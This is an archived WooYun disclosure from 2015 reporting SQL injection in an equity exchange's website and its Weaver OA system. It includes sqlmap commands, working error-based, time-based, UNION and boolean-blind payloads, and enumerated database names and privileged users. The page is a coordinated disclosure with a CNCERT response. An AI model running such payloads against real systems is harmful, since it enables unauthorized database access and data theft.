当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155055

漏洞标题:浙江股权交易中心多处SQL注入打包

相关厂商:cncert国家互联网应急中心

漏洞作者: hecate

提交时间:2015-11-27 15:24

修复时间:2016-01-15 17:14

公开时间:2016-01-15 17:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

WAF没起作用

详细说明:

有前辈提过 http://**.**.**.**/bugs/wooyun-2010-0143184 里面的注入点已修复,看来厂商态度积极
但是还有两处疏漏
1.

sqlmap.py -u "http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2*" --random-agent --dbms=MySQL
参数 cityCode 可注入


有WAF,Linux下注入被ban掉

Screenshot - 2015年11月22日 - 17时12分33秒.png


不知道为什么Windows下注入就正常了

Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971c
e458000f682fa47&func=search&catalog=0401&cityCode=2' AND (SELECT 3214 FROM(SELEC
T COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(3214=3214,1))),0x71766b7171,FLOOR(RA
ND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xxTE'='xxTE
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971c
e458000f682fa47&func=search&catalog=0401&cityCode=2' AND (SELECT * FROM (SELECT(
SLEEP(5)))Alit) AND 'nRcI'='nRcI
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971c
e458000f682fa47&func=search&catalog=0401&cityCode=-7300' UNION ALL SELECT CONCAT
(0x7171786b71,0x5757627458766a6a5a696b5456784d424853556b456968634f67726f7979636c
426e76657a415562,0x71766b7171)-- -
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0


2.

http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2&industry=160000*
参数 industry 可注入


Parameter: industry (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&c
ityCode=2&industry=160000' AND (SELECT 5023 FROM(SELECT COUNT(*),CONCAT(0x717670
7671,(SELECT (ELT(5023=5023,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATIO
N_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hZyG'='hZyG
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&c
ityCode=2&industry=160000' AND (SELECT * FROM (SELECT(SLEEP(5)))GvXD) AND 'IoVM'
='IoVM
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&c
ityCode=2&industry=-8180' UNION ALL SELECT CONCAT(0x7176707671,0x466352525a63524
475506668414d6f43676c68536871437255544c445977776958704d6d676e4164,0x716a7a6a71)--


current user:    'gqmysql@localhost'
available databases [4]:
[*] guquan
[*] information_schema
[*] mysql
[*] test


5000多用户

图像 1.png


3.http://**.**.**.**,oa系统用的泛微的,存在注入

sqlmap.py -u "http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=10" --current-user
Parameter: fileid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fileid=10 AND 4637=4637
---
the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

漏洞证明:

修复方案:

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-01 17:12

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价